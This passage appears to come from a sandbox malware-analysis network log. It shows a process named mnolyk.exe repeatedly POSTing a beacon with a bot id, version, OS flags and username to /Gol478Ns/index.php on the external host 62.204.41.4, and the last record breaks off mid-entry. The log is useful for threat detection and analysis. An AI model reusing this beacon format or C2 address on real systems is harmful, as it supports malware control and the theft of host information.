                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            398 | 192.168.2.4 | 50093 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:18.875583887 CET | 587 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:18.939227104 CET | 587 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:18 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            399 | 192.168.2.4 | 50094 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:19.127295971 CET | 588 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:19.192943096 CET | 588 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            4 | 192.168.2.4 | 49699 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:25.386825085 CET | 193 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:25.449558973 CET | 193 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:25 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            40 | 192.168.2.4 | 49735 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:36.528446913 CET | 229 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:36.591797113 CET | 229 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            400 | 192.168.2.4 | 50095 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:19.370464087 CET | 589 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:19.435214996 CET | 589 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            401 | 192.168.2.4 | 50096 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:19.609783888 CET | 590 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:19.674107075 CET | 590 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            402 | 192.168.2.4 | 50097 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:19.882190943 CET | 591 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:19.946125984 CET | 591 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            403 | 192.168.2.4 | 50098 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:20.119029045 CET | 592 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:20.185551882 CET | 592 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            404 | 192.168.2.4 | 50099 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:20.353141069 CET | 592 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:20.416022062 CET | 593 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            405 | 192.168.2.4 | 50100 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:20.589445114 CET | 593 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:20.653697968 CET | 594 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            406 | 192.168.2.4 | 50101 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:20.831047058 CET | 594 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:20.897475958 CET | 595 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            407 | 192.168.2.4 | 50102 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:21.074270010 CET | 595 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:21.141248941 CET | 596 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:21 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            408 | 192.168.2.4 | 50103 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:21.322750092 CET | 596 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:21.387979031 CET | 597 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:21 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            409 | 192.168.2.4 | 50104 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:21.557053089 CET | 597 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:21.622164965 CET | 598 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:21 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            41 | 192.168.2.4 | 49736 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:36.780328035 CET | 230 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:36.848560095 CET | 230 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            410 | 192.168.2.4 | 50105 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:21.799160957 CET | 598 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:21.864048004 CET  599                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:21 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            411         192.168.2.4  50106        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:22.067217112 CET  599                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:22.132869005 CET  600                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:22 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            412         192.168.2.4  50107        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:22.315654993 CET  600                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:22.377834082 CET  601                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:22 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            413         192.168.2.4  50108        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:22.559760094 CET  601                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:22.625056982 CET  602                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:22 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            414         192.168.2.4  50109        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:22.797983885 CET  602                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:22.860326052 CET  603                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:22 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            415         192.168.2.4  50110        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:23.028270006 CET  603                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
